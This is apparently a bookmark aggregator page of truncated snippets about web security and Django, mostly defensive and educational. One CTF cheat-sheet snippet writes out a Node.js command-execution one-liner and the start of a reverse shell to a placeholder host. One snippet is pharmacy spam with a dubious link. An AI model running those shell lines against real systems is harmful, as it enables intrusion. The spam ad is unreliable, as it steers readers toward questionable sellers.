脆弱性診断につかえるツール集 - Qiita
概要 自宅サーバのセキュリティチェックをして見た。 脆弱性診断ツール nikto niktoは、Web アプリケーションセキュリティスキャナー。 $ sudo apt install nikto -y $ nikto -h localhost - Nikto v2.1.5 --------------------------------------------------------------------------- + Target IP: 127.0.0.1 + Target Hostname: localhost + Target Port: 80 + Start Time: 2019-08-23 22:26:00 (GMT9) ---------------------------------------------------------------------------
Webエンジニア向けセキュアコーディング学習サービス「KENRO」のトライアルを一般開放しました - Flatt Security Blog
こんにちは、Flatt Security執行役員の @toyojuni です。 弊社はWebエンジニア向けのセキュアコーディング学習プラットフォーム「KENRO(ケンロー)」を提供しています。この度、商談の中で限られたお客様にのみ提供していた「KENRO」のトライアル利用を 無償・期間無制限で一般開放 することとしましたので、そのお知らせも兼ねつつ一般開放に至った背景などをこちらのブログでお話ししようと思います。 「KENRO」とは? 「KENRO」のトライアルとは? トライアル一般開放の背景 トライアルはどのような人にオススメ? トライアルの利用方法 最後に 「KENRO」とは? 「KENRO」は、Web 開発に必要なセキュリティ技術のハンズオンの研修・学習を行うことができる、環境構築不要のクラウド型学習プラットフォームです。 https://flatt.tech/kenro これまでエ
サマリ CookieやlocalStorage等でセッション管理しているウェブサイトがクリックジャッキング対策していない場合、どの条件で被害を受けるかを説明する。SameSite属性のないCookieでセッション管理しているウェブサイトは、主要ブラウザのデフォルト設定ではクリックジャッキングの影響を受けない。一方、loaclStorageにトークン類を格納するウェブサイトでは、Google Chrome等のブラウザでクリックジャッキングの影響がある。また、ブラウザの設定を変更した場合の影響についても説明する。 クリックジャッキングとは クリックジャッキングとは、一言で説明すると「ウェブサイト利用者に意図しないクリック(タップ)をさせる」攻撃です。ウェブサイト上で意図しないクリックを勝手にさせられると、重大な結果になる場合があります。例えば、このURLを閲覧すると、以下のようにTwitter
国内の主要なSaaS企業やSIerに脆弱性診断サービスなどを提供しているFlatt Security社は、Webエンジニアがセキュアコーディングを独習できるオンライン教材「KENRO」のトライアルとしてコンテンツの一部を無料で公開中です。 メールアドレスを登録するだけで利用を開始でき、期間も無制限。 KENROでは「SQLインジェクション」「XSS(クロスサイトスクリプティング)」「ディレクトリトラバーサル」などを始めとする10種類の一般的な脆弱性についてテキストで学び、その学びを基に攻撃者として脆弱性に対する攻撃を「ハッキング演習」で試し、その脆弱性があるコードを自分で修正する「堅牢化演習」まで、オンラインで実践できるユニークな教材です。 演習の結果もKENROが自動判定してくれるため、24時間365日、いつでも学習できます。 無料トライアルでは、一般的な10種類の脆弱性の学習コンテンツ
![Webエンジニアがセキュアコーディングを独習できるオンライン教材「KENRO」の一部を無料公開中[PR]](https://cdn-ak-scissors.b.st-hatena.com/image/square/9ea2c3f33e8bf01c1ac53e8880e27f9425b22a34/height=288;version=1;width=512/https%3A%2F%2Fwww.publickey1.jp%2F2023%2Fkenro_trial10.png)
安全なウェブサイトの作り方 - 1.9 クリックジャッキング | 情報セキュリティ | IPA 独立行政法人 情報処理推進機構
安全なウェブサイトの作り方 - 1.9 クリックジャッキング 概要 ウェブサイトの中には、ログイン機能を設け、ログインしている利用者のみが使用可能な機能を提供しているものがあります。該当する機能がマウス操作のみで使用可能な場合、細工された外部サイトを閲覧し操作することにより、利用者が誤操作し、意図しない機能を実行させられる可能性があります。このような問題を「クリックジャッキングの脆弱性」と呼び、問題を悪用した攻撃を、「クリックジャッキング攻撃」と呼びます。 発生しうる脅威 クリックジャッキング攻撃により、発生しうる脅威は次のとおりです。マウス操作のみで実行可能な処理に限定される点以外は、CSRF攻撃による脅威と同様です。 ログイン後の利用者のみが利用可能なサービスの悪用 利用者が意図しない情報発信、利用者が意図しない退会処理 等 ログイン後の利用者のみが編集可能な設定の変更 利用者情報の公
This article lists the most important security headers you can use to protect your website. Use it to understand web-based security features, learn how to implement them on your website, and as a reference for when you need a reminder. Security headers recommended for websites that handle sensitive user data: Content Security Policy (CSP) Trusted Types Security headers recommended for all websites
CS253 - Web Security
CS 253 Web Security Fall 2021 This course is a comprehensive overview of web security. The goal is to build an understanding of the most common web attacks and their countermeasures. Given the pervasive insecurity of the modern web landscape, there is a pressing need for programmers and system designers to improve their understanding of web security issues. We'll be covering the fundamentals as we
How To Secure Node.js Applications with a Content Security Policy | DigitalOcean
The author selected the Free Software Foundation to receive a donation as part of the Write for DOnations program. Introduction When the browser loads a page, it executes a lot of code to render the content. The code could be from the same origin as the root document, or a different origin. By default, the browser does not distinguish between the two and executes any code requested by a page regar
はじめに こんにちは。自称ホワイトハッカーの人すごいですね。 日本だと他人の管理するサーバーから想定されていない操作でデータを抜き取ることは犯罪ですのでやめましょうね。一円の得にもならないですし。 前回書いた原稿は思った以上の反応があったみたいですが、特にこの後知りたいことなどはこちらに伝わっていません。アラフォーの人は特にお金に興味はないのかもしれませんが、想像力を膨らまして書くことにします。基本的に自分の知ってることなのでWebサイト・Webアプリケーションのバグバウンティに関する話が中心になります。 これまで流れについては以下を参照してください アラフォーのためのバグバウンティの話 どんな脆弱性でお金をもらえるの? 報奨金ってどのくらいのレベルの脆弱性でもらえるのか気になる人も多いと思います。ニュースになるようなゼロデイを見つける必要があるくらい難易度が高いとやる気が起きないのではな
Flatt Security、セキュアコーディング習得を支援するSaaS型eラーニングサービス「Flatt Security Learning Platform」のβ版登録申込を開始。
Flatt Security、セキュアコーディング習得を支援するSaaS型eラーニングサービス「Flatt Security Learning Platform」のβ版登録申込を開始。 サイバーセキュリティ事業を展開する株式会社Flatt Security(本社:東京都文京区、代表取締役社長:井手康貴)はこの度、Webエンジニアのセキュアコーディング習得を支援するSaaS型eラーニングサービス「Flatt Security Learning Platform」のβ版の提供を開始いたしました。 「Flatt Security Learning Platform 」β版の登録申し込みページ https://flatt.tech/learning_platform 「Flatt Security Learning Platform」提供の背景 昨今、複雑化の一途をたどるWebアプリケーションをセ
Scoped styles for CSS, additional media features, keyboard-focusable scroll containers, and more. Unless otherwise noted, changes described apply to the newest Chrome beta channel release for Android, ChromeOS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 118 is beta as of September 13, 2023. You can do
この記事は マイナビ Advent Calendar 2020 の7日目の記事です。 Kali LinuxをAWS環境で建てて、脆弱性診断やセキュリティの勉強をしたい人向けに僕が実際に建てたハッキングラボ環境を簡単に紹介しようと思います。 準備するもの Kali LinuxとテストAttackできる脆弱なサーバを置いてもいいAWSアカウント この環境用のVPCを作成 脆弱なサーバ用のセキュアなサブネット(KaliからHTTP/HTTPSができればOK) Kali Linux用のパブリックサブネット 少量のお金(推奨構成にする場合無料枠の利用ではなくなるので) VPCの作成 そんなに難しいことではないので今回は詳しい説明は省いちゃいます。 VPCの作成やその他NW設定系が初めての方は以下を参考に作るといいかと思います。 dev.classmethod.jp ザックリ以下のようなことができれば
Auth0 React SDK と Cypress で e2e テストを考えてみる | DevelopersIO
SPAで誰もが見れるルートと保護されたルートを分離させるのはよくある設計です. また保護されたルート配下ではログインしたユーザの情報を利用するのもよくある設計です. コンポーネントレベルでの結合テストであればモックを利用することで簡単にテストをかけます. ですがe2eテストとなると実際にログインを経てセッション情報などを保持した状態でのテストが求められ, 前提の難易度が上がります. この記事ではAuth0を利用した認証を含むe2eテストをCypressで行う場合に起こり得る問題とワークアラウンドを書いていきます. 環境 主に下記のライブラリとバージョンで動かしています. "dependencies": { "@auth0/auth0-react": "^1.0.0", "@testing-library/cypress": "^6.0.0", "cypress": "^4.9.0", "p
Description In general Web Share API [https://w3c.github.io/web-share/] allows users to share links from the browser via 3rd party applications (e.g. mail and messaging apps). The problem is that file: scheme is allowed and when a website points to such URL unexpected behavior occurs. In case such a link is passed to the navigator.share function an actual file from the user file system is include
セキュアコーディングの学習サービス「KENRO(ケンロー)」は無料トライアル範囲でも勉強になった - サーバーワークスエンジニアブログ
株式会社Flatt Securityの提供するセキュアコーディングの学習サービス「KENRO(ケンロー)」のトライアル利用が2021年10月に無料になりました。通常は8万円くらいかかるコンテンツの一部が無料になっています。 flatt.tech 無料の範囲をやり終えましたが、素晴らしいサービスで感動しました。 セキュリティに興味がある方には非常にオススメです。 オススメポイント 1. 無料で簡単に始められて期限もない Webサイトでポチポチっと申し込めばすぐに開始できます。 クレジットカード情報なども不要なので安心です。 期限もないので、マイペースで学習できます。 https://flatt.tech/kenro/ 2. よく聞く脆弱性の基礎が学べる OWASP Top 10 などに出てくるようなメジャーな脆弱性10項目のコンテンツがあります。 各項目の中でさらにサブコンテンツがありますが
Djangoフレームワークのセッションの有効期限について調べる必要があったのでまとめておく。 試したバージョンは、Python 3.9、Django 3.2.4。 ドキュメント Djangoのセッションについてのドキュメント https://docs.djangoproject.com/ja/3.2/topics/http/sessions/ Djangoのsettings.pyの設定項目(セッションの部分) https://docs.djangoproject.com/ja/3.2/ref/settings/#sessions セッションのデフォルト設定 Djangoでプロジェクト生成した際のデフォルトの settings.py では、セッションのアプリケーションは有効になっている。 settings.py INSTALLED_APPS = [ 'django.contrib.admin
Password Managers.
Introduction I’ve spent a lot of time trying to understand the attack surface of popular password managers. I think I’ve spent more time analyzing them than practically anybody else, and I think that qualifies me to have an opinion! First, let’s get a few things out of the way. For some reason, few subjects can get heated faster than passwords. Maybe politics and religion, but that’s about it. It’
N 番煎じですが、websocket を体験したいのでチャットアプリを作成します。 前提 pipenv を導入済 フレームワークとライブラリをインストール $ pipenv --python 3.9 $ pipenv install django channels channels-redis $ pipenv install djangorestframework django-filter django-extensions werkzeug django-model-utils django-debug-toolbar django-crispy-forms crispy-bootstrap5 django を用います。 合わせて websocket 通信に必要な「channels」「channels-redis」をインストールします。 channels channels-redis
pysec101 / pysec101 · GitLab
GitLab.com
Easy CSRF bypass
Greetings to the reader, I hope you are doing well. Today I want to talk about one of my findings in a private program at Hacker-One platform, which refers to it as target.com. Firstly:Following some reconnaissance and effort, I found target.com, I create an account on it and tried to understand the application and its functionalities in it. I tried to test a lot of things, but I was unable to ide
クリックジャッキングは、ユーザーを視覚的に騙して悪質なサイトへ誘導する攻撃手法です。本記事ではクリックジャッキングの概要から、攻撃の仕組み、対策方法について解説していきます。
Production ChecklistBefore taking your Next.js application to production, there are some optimizations and patterns you should consider implementing for the best user experience, performance, and security. This page provides best practices that you can use as a reference when building your application, before going to production, and after deployment - as well as the automatic Next.js optimization
米Mozillaは、5月9日(現地時間)にFirefoxの新バージョンとなるWebブラウザ「Firefox 113」をリリースした。Firefox 112から4週間でのバージョンアップとなった。Firefox 112では、2023年4月17日にマイナーバージョンアップの112.0.1が、2023年4月25日に112.0.2がリリースされている。112.0.1では、以下の修正が行われた。 Firefoxをアップデートすると、Cookieの日付が遠い未来に設定されているように見えるバグを修正。この不具合により、Cookieが意図せず削除された可能性がある このマイナーバージョンアップでは、セキュリティアップデートは行われなかった。112.0.2では、以下の修正が行われた。 特にアニメーションテーマを使用している場合に、最小化された (または完全に覆われた) ウィンドウでのアニメーション画像のメ
ReactとDjango REST framework、Postgresで簡単なSPAアプリを作成しました。環境の準備からブラウザに表示させるまでをまとめます。 環境の用意次のようなコンテナ環境を用意します。また、DockerとDocker Composeのインストールが必要です。 Front-end:Reactが乗っかったNode.jsのコンテナ。表側はこのコンテナで用意したSPAを表示させます。Back-end:Django REST frameworkがインストールされたPythonのコンテナ。テンプレート機能は使わず、JSON形式のデータを返すWebAPIとして使います。DB:PostgreSQLのコンテナ。事前準備-ディレクトリ構成下記のような構成でDockerfileとYMLファイル、ディレクトリを用意しました。 . ├── code/ │ ├── django_rest_
Reliable Pharmacy USA Purchase Using Bitcoin http://url-qr.tk/pharmacy – Our prices are 70% less than your local pharmacy – Various payment methods: MasterCard / Visa / AMEX / PayPal / BitCoin – Fast delivery and complete anonymity – 100% legal products. – Bonus pills and big discounts for every order – Quality and pharmaceutical dosage. – Fast delivery guaranteed. – Your full satisfaction is guar
In its lifespan, Mozilla's HTTP Observatory tool has scanned over 6.9 million websites, providing useful, actionable insights into how developers can improve web security and guard their sites against would-be attackers. The HTTP Observatory tests website compliance with security best practices, mainly concerning the correct usage of HTTP headers. When a scan is complete, it provides a report to t
W3C Workshop on Permissions
Executive Summary Future work should build on the key strengths of the web: safety-by-default, linkability, ephemerality, and interoperability across browsers and platforms. There was significant interest in non-prompt, contextual permission UIs, which are more seamlessly embedded into the user’s journey, and follow the “user-pull” model instead of the “developer-push” model. This approach could a
A flaw in LastPass password manager leaks credentials from previous site
Magento flaw exploited to deploy persistent backdoor hidden in XML | Cyberattack disrupted services at Omni Hotels & Resorts | HTTP/2 CONTINUATION Flood technique can be exploited in DoS attacks | US cancer center City of Hope: data breach impacted 827149 individuals | Ivanti fixed for 4 new issues in Connect Secure and Policy Secure | Jackson County, Missouri, discloses a ransomware attack | Goog
CloudFront+S3環境でLambda@Edgeを用いてHTTPセキュリティヘッダーを付与する方法 - サーバーワークスエンジニアブログ
HTTPセキュリティヘッダーとは 「HTTPセキュリティヘッダー」とは、Webブラウザでのセキュリティ対策のために使用されるHTTPヘッダーです。 Webブラウザがセキュリティヘッダーの設定内容に従って動作することで、クロスサイトスクリプティング(XSS)やクリックジャッキング(Clickjacking)などの攻撃を困難にすることができます。(WebブラウザがHTTPセキュリティヘッダーに対応していることが前提になります) また、nginxやApacheなどのWebサーバーでもこれらのSecurity Headerを付与することができるようになっています。 「HTTPセキュリティヘッダー」の代表的なものとしては以下があります。 (詳細な説明や設定方法についてはリンク先のページをご参考ください) Strict-Transport-Security 「Strict-Transport-Secu
この記事は最終更新日から1年以上が経過しています。情報が古くなっている可能性があります。 Django Rest Framework で開発していて、クライアントとの連携用に CORS の設定が必要になった。同じ localhost でも、どうやらポートが違うと CORS エラーが出るみたいで厄介。 django-cors-headers の設定 少し調べたところ、django-cors-headers というのを入れればいいらしい。 pipenv install django-cors-headers ということで、pipenv でインストールした。 その後、settings.py を開いて、INSTALLED_APPS に corsheaders を、MIDDLEWARE の上の方に corsheaders.middleware.CorsMiddleware を追記する。 私の場合は
10 security tips for frontend developersPublished on April 06, 2020 Photo by Dima Pechurin on Unsplash Web security is a topic that is often overlooked by frontend developers. When we assess the quality of the website, we often look at metrics like performance, SEO-friendliness, and accessibility, while the website’s capacity to withstand malicious attacks often falls under the radar. And even tho
Including OWASP ModSecurity Core Rule Set – Welcome to netnea
Title: Including OWASP ModSecurity Core Rule Set Author: Christian Folini (@ChrFolini) Tutorial Number: 7 Last Update: 2024-01-13 Release Date: 2016-1-01 Difficulty: Hard Duration: 1 1/2h What are we doing? We are embedding the OWASP ModSecurity Core Rule Set in our Apache web server and eliminating false alarms. Why are we doing this? The ModSecurity Web Application Firewall, as we set up in Tuto
CTFのWebセキュリティにおけるJavaScript,nodejsまとめ(Prototype pollution, 難読化) - はまやんはまやんはまやん
この記事はCTFのWebセキュリティ Advent Calendar 2021の18日目の記事です。 本まとめはWebセキュリティで共通して使えますが、セキュリティコンテスト(CTF)で使うためのまとめです。 悪用しないこと。勝手に普通のサーバで試行すると犯罪です。 JavaScript / node.js RCEワンライナー console.log(process.mainModule.require('child_process').execSync('ls -la').toString()); 適当にコマンドインジェクションするとき いろいろ&&コマンド;//いろいろみたいな感じにするといい。前半の色々はちゃんと実行できるように頑張ること リバースシェル require("child_process").exec("bash -i >& /dev/tcp/[IPAddress]/[P
この記事は、「Django Advent Calendar 2019」の22日目の記事です。 DjangoでJWT認証のAPIを構築してみました! 事前準備 Django REST frameworkの構築 以前書いた記事でAPIの構築までを説明します。 Django #005 – API構築 環境 Python v3.6.0 Django v2.2.1 Django REST framework v3.9.3 今回は、JWT認証のAPIを構築してみます! まずは、各モジュールをインストールします。 Simple JWTをインストール pip install djangorestframework_simplejwt djoserをインストール pip install djoser django-cors-headersをインストール pip install django-cors-hea
A Comprehensive Guide to NodeJS Security Best Practices
Photo by Surface on UnsplashToday we will see how we can improve the security of a NodeJS application. There are lots of aspects to security in the NodeJS application. We will get familiar with many of the concepts and see how we can prevent unwanted attacks on our application. Nothing is bulletproof, but being safe doesn’t hurt. Before we begin…I have created a professional boilerplate with Expre
Getting started with Burp Suite Professional / Community Edition
Back to documentation home Professional and Community Edition Professional and Community Edition Getting started System requirements Step 1: Download and install Step 2: Intercepting HTTP traffic Step 3: Modifying requests Step 4: Setting the target scope Step 5: Reissuing requests Step 6: Running your first scan [Pro only] Step 7: Generating a report [Pro only] Step 8: What next? Testing workflow
この投稿は 「Django Advent Calendar 2020 - Qiita」 4日目の記事です。 akiyoko です。 この記事では、Django で簡単に楽観的排他制御を実装する方法について説明します。Django の楽観的排他制御については拙著『現場で使える Django REST Framework の教科書』の第11章「現場で使える Tips 集」の中でも触れていますが、もう少し詳しく解説してみたいと思います。 目次 はじめに 楽観的排他制御と悲観的排他制御 READ COMMITTED の挙動 django-concurrency パッケージを利用する まとめ 宣伝 検証環境 Windows 10 Home Django 3.1 PostgreSQL 13.1 はじめに 複数ユーザからほぼ同じタイミングで同じレコードに対して更新をおこなうと、タイミングによってはレース
How To Bypass CSP By Hiding JavaScript In A PNG Image Hide a malicious JavaScript library in a PNG image and tweet it, then include it in a vulnerable website by exploiting a XSS bypassing its Content-Security-Policy (CSP). Hide a malicious JavaScript library into a PNG image and tweet it, then include it in a vulnerable website by exploiting a XSS bypassing its Content-Security-Policy (CSP). It's
面白いセキュリティツール
セキュリティ系のツールで面白かったものをまとめた。 ・Spectrology 画像ファイルを音楽ファイルに変換するPythonのステガノグラフィツール。 ・Github dorks Githubにある機密データを検索するPythonのツール。 ・Maltrail 悪意のあるトラフィック検出システム。 ・Yuki Chan 様々なハッキングツールによる試験を自動化。類似ツール:Sn1per、Fast-Track ・A2SV SSLの有名な脆弱性を自動スキャンするPythonのツール。 ・Mr.SIP SIP向けの攻撃をするPythonツール。SIPといえばVoLTEの脆弱性が昔問題になった。 ・Dirsearch コマンドラインのPythonのWebディレクトリスキャナツール。 ・Jack Clickjacking、UI redressのPoCツール。 ・T50 ネットワークストレステスト用
Home InfiniBand C# Docker Linux Raspberry Pi RouterOS Windows Mkdocs プライバシー・ポリシー DjangoアプリをDockerで運用する Djangoとは、Pythonで利用できるWebアプリケーションフレームワークです。 この記事では、Djangoを使って開発したアプリケーションをDocker環境へデプロイした際の手順を記載します。 準備 ベースイメージの選定 オリジナルのアプリケーションをDocker上で動作させるため、Dockerイメージを自前でビルドします。 今回はPythonでDjangoアプリケーションを動かすので、python:3.8-alpineを選択しました。1 コンテナ設計 図 1. コンテナ構成図[^2] 上記図のような感じにしたいと思います。 アプリサーバ Djangoアプリは、Webアプリと定期バ
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
2023年4月においてクリックジャッキング未対策のサイトはどの条件で被害を受けるか
Webエンジニアがセキュアコーディングを独習できるオンライン教材「KENRO」の一部を無料公開中[PR]
Security headers quick reference | Articles | web.dev
アラフォーのためのバグバウンティの話2 - Qiita
Chrome 118 beta | Blog | Chrome for Developers
AWS環境にKali Linuxを建てて遊ぶ方法 - chikoblog
Stealing local files using Safari Web Share API
Djangoフレームワークのセッションの有効期限 - 偏った言語信者の垂れ流し
django-channels を使った websocket を用いたチャットアプリの作成
悪意あるサイトにこっそり誘導 クリックジャッキング | yamory Blog
Deploying: Production Checklist | Next.js
「Firefox 113」を試す - ピクチャーインピクチャーで動画をコントロール可能に
DockerでReact + Django + Postgresの連携・SPA構築チュートリアル
pfizer aldactone Purchase Using Bitcoin – TrEd College
Introducing the MDN HTTP Observatory | MDN Blog
Django Rest Framework で CORS の設定が効かないと思い込んでいた話
10 security tips for frontend developers
dayjournal | Try #036 – DjangoでJWT認証のAPIを構築してみた
Django で楽観的排他制御を簡単に実装する方法(初級者向け) - akiyoko blog
How To Bypass CSP By Hiding JavaScript In A PNG Image
DjangoアプリをDockerで運用する - roy-n-roy メモ